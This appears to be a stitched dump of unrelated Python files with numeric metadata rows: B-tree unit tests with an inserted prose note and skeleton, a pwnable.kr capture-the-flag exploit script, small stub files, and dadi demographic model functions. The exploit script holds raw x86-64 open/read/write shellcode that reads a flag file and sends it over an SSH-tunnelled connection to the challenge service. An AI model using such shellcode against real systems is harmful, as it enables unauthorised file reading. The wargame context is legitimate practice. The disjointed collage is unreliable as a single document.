        expected_output = [12]
        self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex(\
            ImplementMe.InsertIntoIndex( btree, key ), lower_bound, upper_bound ) )
# Freebie bonus for grinding out a tough semester
# Look up a key in an empty tree
class TestCaseB1(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_unknown(self):
        btree = Index([Node()]*1)
        key = 9
        expected_output = False
        self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex( btree, key ) )
# Easy bonus for assignment difficulty calibration
# Insert in order
class TestCaseB2(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_unknown(self):
        btree = Index([Node()]*1)
        btree.nodes[ 0 ] = Node(\
            KeySet((66, -1)),\
            PointerSet((0,0,0)))
        key = 87
        expected_output = Index([Node()]*1)
        expected_output.nodes[ 0 ] = Node(\
            KeySet((66, 87)),\
            PointerSet((0,0,0)))
        self.assertEqual( expected_output, ImplementMe.InsertIntoIndex( btree, key ) )
# Easy bonus for assignment difficulty calibration
# Look up a key inserted into a tree with only one element
class TestCaseB3(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_unknown(self):
        btree = Index([Node()]*1)
        btree.nodes[0] = Node(\
            KeySet((7, -1)),\
            PointerSet((0,0,0)))
        key = 12
        expected_output = True
        self.assertEqual( expected_output, ImplementMe.LookupKeyInIndex(\
            ImplementMe.InsertIntoIndex( btree, key ), key ) )
# Easy bonus for assignment difficulty calibration
# Range query that doesn't overlap tree at all
class TestCaseB4(unittest.TestCase):
    @timeout_decorator.timeout(15)
    def test_unknown(self):
        btree = Index([Node()]*4)
        btree.nodes[0] = Node(\
            KeySet((42, 66)),\
            PointerSet((1,2,3)))
        btree.nodes[1] = Node(\
            KeySet((7,87)),\
            PointerSet((0,0,2)))
        btree.nodes[2]=Node(\
            KeySet((42,-1)),\
            PointerSet((0,0,3)))
        btree.nodes[3]=Node(\
            KeySet((66,68)),\
            PointerSet((0,0,0)))
        lower_bound = 87
        upper_bound = 99
        expected_output = []
        self.assertEqual( expected_output, ImplementMe.RangeSearchInIndex( btree, lower_bound, upper_bound ) )
# Run all unit tests above.
unittest.main(argv=[''],verbosity=2, exit=False)
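The suite above drives three static methods on an ImplementMe class imported from implement_me, over the Index/Node/KeySet/PointerSet types from node and index. A minimal skeleton of that interface is sketched below; the behavioural notes in the comments are inferred from the assertions (for instance, RangeSearchInIndex appears half-open, since TestCase16's equal bounds yield an empty list), and this is not the assignment's actual solution.
# Hypothetical skeleton of the interface the tests exercise; inferred from
# the assertions above, not the course's reference implementation.
class ImplementMe:
    @staticmethod
    def InsertIntoIndex(index, key):
        # Expected to return a new, linearised Index; the tests compare
        # against a fully materialised expected tree, node by node.
        raise NotImplementedError

    @staticmethod
    def LookupKeyInIndex(index, key):
        # Expected to return True iff key sits in a leaf reachable from the
        # root; unreachable "fake data" nodes must not affect the answer.
        raise NotImplementedError

    @staticmethod
    def RangeSearchInIndex(index, lower_bound, upper_bound):
        # Expected to return the sorted keys k with
        # lower_bound <= k < upper_bound (TestCase16's equal bounds give []).
        raise NotImplementedError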
| 31.906528
| 110
| 0.526715
| 2,466
| 21,505
| 4.527981
| 0.093674
| 0.098513
| 0.081677
| 0.045406
| 0.84014
| 0.812735
| 0.795003
| 0.769031
| 0.751657
| 0.73491
| 0
| 0.070368
| 0.326622
| 21,505
| 673
| 111
| 31.953938
| 0.700711
| 0.111555
| 0
| 0.853565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046243
| 1
| 0.046243
| false
| 0
| 0.011561
| 0
| 0.104046
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99d6f6cf363d668052bc1b7957cce42a5a932207
| 2,379
|
py
|
Python
|
asm/asm.py
|
FrancescoLucarini/pwnable.kr-exploits
|
39bee10e2145a3ad2baa773c752f145f19e25af5
|
[
"MIT"
] | 1
|
2021-02-09T14:11:52.000Z
|
2021-02-09T14:11:52.000Z
|
asm/asm.py
|
FrancescoLucarini/pwnable.kr-exploits
|
39bee10e2145a3ad2baa773c752f145f19e25af5
|
[
"MIT"
] | null | null | null |
asm/asm.py
|
FrancescoLucarini/pwnable.kr-exploits
|
39bee10e2145a3ad2baa773c752f145f19e25af5
|
[
"MIT"
] | null | null | null |
from pwn import *
context.update(arch="amd64", os="linux", bits="64")
file_name = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"+"\x00"
v1 = [""]*(int(len(file_name)/8)+8)
for v0 in range(int(len(file_name)/8)):
    v1[v0] = p64(int((file_name[(v0*8):(v0+1)*8].encode("ascii")).hex(), 16))
print(hexdump(v1)) #print(p64(int((file_name.encode("ascii")).hex(), 16)))
shellcode="\xb0\x02\x48\x31\xff\x57\x48\xbf\x30\x6f\x30\x6f\x30\x6f\x6e\x67\x57\x48\xbf\x30\x6f\x30\x6f\x30\x6f\x30\x6f\x57\x48\xbf\x30\x30\x30\x30\x30\x30\x30\x30\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x30\x30\x30\x30\x30\x30\x6f\x6f\x57\x48\xbf\x30\x30\x30\x30\x30\x30\x30\x30\x57\x48\xbf\x30\x30\x30\x30\x30\x30\x30\x30\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x30\x30\x30\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x6c\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x57\x48\xbf\x69\x73\x5f\x76\x65\x72\x79\x5f\x57\x48\xbf\x6c\x65\x5f\x6e\x61\x6d\x65\x5f\x57\x48\xbf\x79\x5f\x74\x68\x65\x5f\x66\x69\x57\x48\xbf\x69\x6c\x65\x2e\x73\x6f\x72\x72\x57\x48\xbf\x64\x5f\x74\x68\x69\x73\x5f\x66\x57\x48\xbf\x65\x61\x73\x65\x5f\x72\x65\x61\x57\x48\xbf\x5f\x66\x69\x6c\x65\x5f\x70\x6c\x57\x48\xbf\x2e\x6b\x72\x5f\x66\x6c\x61\x67\x57\x48\xbf\x5f\x70\x77\x6e\x61\x62\x6c\x65\x57\x48\xbf\x2f\x74\x68\x69\x73\x5f\x69\x73\x57\x48\xbf\x2e\x2f\x2e\x2f\x2e\x2f\x2e\x2f\x57\x48\x89\xe7\x48\x31\xf6\x0f\x05\x89\xc7\x30\xc0\x48\x89\xe6\xb2\x64\x0f\x05\xb0\x01\x48\x31\xff\x48\x83\xc7\x01\x0f\x05\xb0\x60\x48\x31\xff\x0f\x05"
server = ["pwnable.kr", 2222, "asm", "guest"]
server_nc = ["pwnable.kr", 9026]
conn_ssh = ssh(host=server[0], port=server[1], user=server[2], password=server[3])
conn_nc = conn_ssh.remote(server_nc[0], server_nc[1])
conn_nc.send(shellcode)
print(conn_nc.recv(2024, timeout=0.5))
print(conn_nc.recv(2024, timeout=0.5))
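The hand-assembled byte string above implements an open/read/write sequence that pushes the long flag-file path onto the stack eight bytes at a time. For reference, pwntools can generate an equivalent payload from its shellcraft templates; this is a sketch under the same amd64/Linux context, reusing the file_name variable built earlier, and is untested against the live service.
# Hypothetical shellcraft-based equivalent of the hand-written shellcode.
flag_path = file_name.rstrip("\x00")      # reuse the long name built above
sc = shellcraft.open(flag_path)           # open(path, O_RDONLY), fd in rax
sc += shellcraft.read("rax", "rsp", 100)  # read(fd, stack buffer, 100)
sc += shellcraft.write(1, "rsp", 100)     # write(stdout, stack buffer, 100)
payload = asm(sc)                         # assemble to raw bytes for sending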
| 148.6875
| 1,504
| 0.749475
| 505
| 2,379
| 3.475248
| 0.209901
| 0.290598
| 0.364103
| 0.396581
| 0.437037
| 0.402849
| 0.387464
| 0.387464
| 0.355556
| 0.324786
| 0
| 0.266265
| 0.02438
| 2,379
| 15
| 1,505
| 158.6
| 0.489875
| 0.022699
| 0
| 0.133333
| 0
| 0.066667
| 0.762478
| 0.741394
| 0.066667
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0.066667
| 0.066667
| 0
| 0.066667
| 0.2
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
99e1425755a55dae5584d6ebce190088e52a386e
| 40
|
py
|
Python
|
Python/Tests/TestData/RemoveImport/EmptyFuncDef2.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/RemoveImport/EmptyFuncDef2.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
Python/Tests/TestData/RemoveImport/EmptyFuncDef2.py
|
nanshuiyu/pytools
|
9f9271fe8cf564b4f94e9456d400f4306ea77c23
|
[
"Apache-2.0"
] | null | null | null |
def f():
    import fob
    import oar
| 13.333333
| 15
| 0.55
| 6
| 40
| 3.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.375
| 40
| 3
| 16
| 13.333333
| 0.88
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.666667
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8230886a2a3cb27a9fe719a9a8515e6855890612
| 112
|
py
|
Python
|
demos/demo_T9.py
|
kul-group/MAZE-sim
|
0f85e74bf93f9242a73bcfaa20a593ae966f38fa
|
[
"MIT"
] | 13
|
2021-03-10T18:40:32.000Z
|
2022-03-21T20:40:57.000Z
|
demos/demo_T9.py
|
kul-group/MAZE-sim
|
0f85e74bf93f9242a73bcfaa20a593ae966f38fa
|
[
"MIT"
] | 27
|
2021-01-28T23:18:44.000Z
|
2021-05-06T19:33:09.000Z
|
demos/demo_T9.py
|
kul-group/MAZE-sim
|
0f85e74bf93f9242a73bcfaa20a593ae966f38fa
|
[
"MIT"
] | 4
|
2021-03-19T20:46:15.000Z
|
2022-03-21T20:40:59.000Z
|
# T9 surrounded with 4 OH's 1 Tcluster O-Si-OH
# T9 surrounded with 4 Si-OH3
# 1 T cluster, and a 5 T cluster
| 18.666667
| 46
| 0.696429
| 25
| 112
| 3.12
| 0.64
| 0.307692
| 0.410256
| 0.435897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.093023
| 0.232143
| 112
| 6
| 47
| 18.666667
| 0.813953
| 0.928571
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
41c476cce5ed340c7cdf8aacfdc52221ceae5609
| 174
|
py
|
Python
|
config_generation/__init__.py
|
mhqz/deflect
|
ea1ffeb77a867185f287b56810a49455b2fff8ff
|
[
"CC-BY-4.0"
] | null | null | null |
config_generation/__init__.py
|
mhqz/deflect
|
ea1ffeb77a867185f287b56810a49455b2fff8ff
|
[
"CC-BY-4.0"
] | null | null | null |
config_generation/__init__.py
|
mhqz/deflect
|
ea1ffeb77a867185f287b56810a49455b2fff8ff
|
[
"CC-BY-4.0"
] | null | null | null |
from config_generation.bind import generate_bind_config
from config_generation.nginx import generate_nginx_config
from config_generation.banjax import generate_banjax_config
| 43.5
| 59
| 0.913793
| 24
| 174
| 6.25
| 0.333333
| 0.2
| 0.4
| 0.346667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 174
| 3
| 60
| 58
| 0.925926
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
41c6435008b20d4d5326eccc0b19caff3e26269f
| 33,020
|
py
|
Python
|
dadiStuff/dadiFunctions.py
|
kern-lab/shanku_et_al
|
5d8a1bd9f273a7023b4be48d5fc9610f65ecb295
|
[
"MIT"
] | null | null | null |
dadiStuff/dadiFunctions.py
|
kern-lab/shanku_et_al
|
5d8a1bd9f273a7023b4be48d5fc9610f65ecb295
|
[
"MIT"
] | null | null | null |
dadiStuff/dadiFunctions.py
|
kern-lab/shanku_et_al
|
5d8a1bd9f273a7023b4be48d5fc9610f65ecb295
|
[
"MIT"
] | null | null | null |
#A collection of functions for dealing with Dadi models
# A. Kern
import dadi
import numpy
import scipy
import pylab
#import nlopt
######### Demographic stuff
def OutOfAfricaGrowB((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA))
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
            m12=0, m21=0)
    nuEu0 = nuEu_func(TB)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=0, m13=0, m21=0, m23=0,
            m31=0, m32=0)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_admix((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA,T_ad, p_ad, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA+T_ad))
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
            m12=0, m21=0)
    nuEu0 = nuEu_func(TB)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA+T_ad))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA+T_ad)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=0, m13=0, m21=0, m23=0,
            m31=0, m32=0)
    nuEu0 = nuEu_func(TEuNA)
    nuNA0 = nuNA_func(TEuNA)
    phi = dadi.PhiManip.phi_3D_admix_1_and_2_into_3(phi, p_ad,0, xx,xx,xx)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/T_ad)
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/T_ad)
    phi = dadi.Integration.three_pops(phi, xx, T_ad, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=0, m13=0, m21=0, m23=0,
            m31=0, m32=0)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig_Af_NA((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA,mNA_Af,mAf_NA, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA))
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
            m12=0, m21=0)
    nuEu0 = nuEu_func(TB)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=0, m13=mAf_NA, m21=0, m23=0,
            m31=mNA_Af, m32=0)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA))
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
            m12=mAf_Eu, m21=mEu_Af)
    nuEu0 = nuEu_func(TB)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
            m31=mNA_Af, m32=mNA_Eu)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig_noAncient((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA))
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
            m12=0, m21=0)
    nuEu0 = nuEu_func(TB)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
            m31=mNA_Af, m32=mNA_Eu)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica_mig_admix((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA,T_ad,p_ad,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TB+TEuNA+T_ad))
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu_func,
            m12=mAf_Eu, m21=mEu_Af)
    nuEu0 = nuEu_func(TB)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA+T_ad))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA+T_ad)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
            m31=mNA_Af, m32=mNA_Eu)
    nuEu0 = nuEu_func(TEuNA)
    nuNA0 = nuNA_func(TEuNA)
    phi = dadi.PhiManip.phi_3D_admix_1_and_2_into_3(phi, p_ad,0, xx,xx,xx)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/T_ad)
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/T_ad)
    phi = dadi.Integration.three_pops(phi, xx, T_ad, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
            m31=mNA_Af, m32=mNA_Eu)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica2((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu0,
            m12=0, m21=0)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=0, m13=0, m21=0, m23=0,
            m31=0, m32=0)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica2_mig((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu0,
            m12=mAf_Eu, m21=mEu_Af)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
            m31=mNA_Af, m32=mNA_Eu)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica2_mig_admix((nuAf, nuEu0, nuEu, nuNA0, nuNA,
        TAf, TB, TEuNA,T_ad,p_ad,mAf_Eu,mAf_NA,mEu_Af,mEu_NA,mNA_Af,mNA_Eu, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu0,
            m12=mAf_Eu, m21=mEu_Af)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/(TEuNA+T_ad))
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/TEuNA+T_ad)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
            m31=mNA_Af, m32=mNA_Eu)
    nuEu0 = nuEu_func(TEuNA)
    nuNA0 = nuNA_func(TEuNA)
    phi = dadi.PhiManip.phi_3D_admix_1_and_2_into_3(phi, p_ad,0, xx,xx,xx)
    nuEu_func = lambda t: nuEu0*(nuEu/nuEu0)**(t/T_ad)
    nuNA_func = lambda t: nuNA0*(nuNA/nuNA0)**(t/T_ad)
    phi = dadi.Integration.three_pops(phi, xx, T_ad, nu1=nuAf,
            nu2=nuEu_func, nu3=nuNA_func,
            m12=mAf_Eu, m13=mAf_NA, m21=mEu_Af, m23=mEu_NA,
            m31=mNA_Af, m32=mNA_Eu)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica3((nuAf, nuEu, nuNA,
        TAf, TB, TEuNA, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu,
            m12=0, m21=0)
    phi = dadi.PhiManip.phi_2D_to_3D_split_2(xx, phi)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu, nu3=nuNA,
            m12=0, m13=0, m21=0, m23=0,
            m31=0, m32=0)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
def OutOfAfrica4((nuAf, nuEu, nuNA,
        TAf, TB, TEuNA, p_misid), (n1,n2,n3), pts):
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    phi = dadi.Integration.one_pop(phi, xx, TAf, nu=nuAf)
    phi = dadi.PhiManip.phi_1D_to_2D(xx, phi)
    phi = dadi.Integration.two_pops(phi, xx, TB, nu1=nuAf, nu2=nuEu,
            m12=0, m21=0)
    phi = dadi.PhiManip.phi_2D_to_3D_split_1(xx, phi)
    phi = dadi.Integration.three_pops(phi, xx, TEuNA, nu1=nuAf,
            nu2=nuEu, nu3=nuNA,
            m12=0, m13=0, m21=0, m23=0,
            m31=0, m32=0)
    fs = dadi.Spectrum.from_phi(phi, (n1,n2,n3), (xx,xx,xx))
    return (1-p_misid)*fs + p_misid * dadi.Numerics.reverse_array(fs)
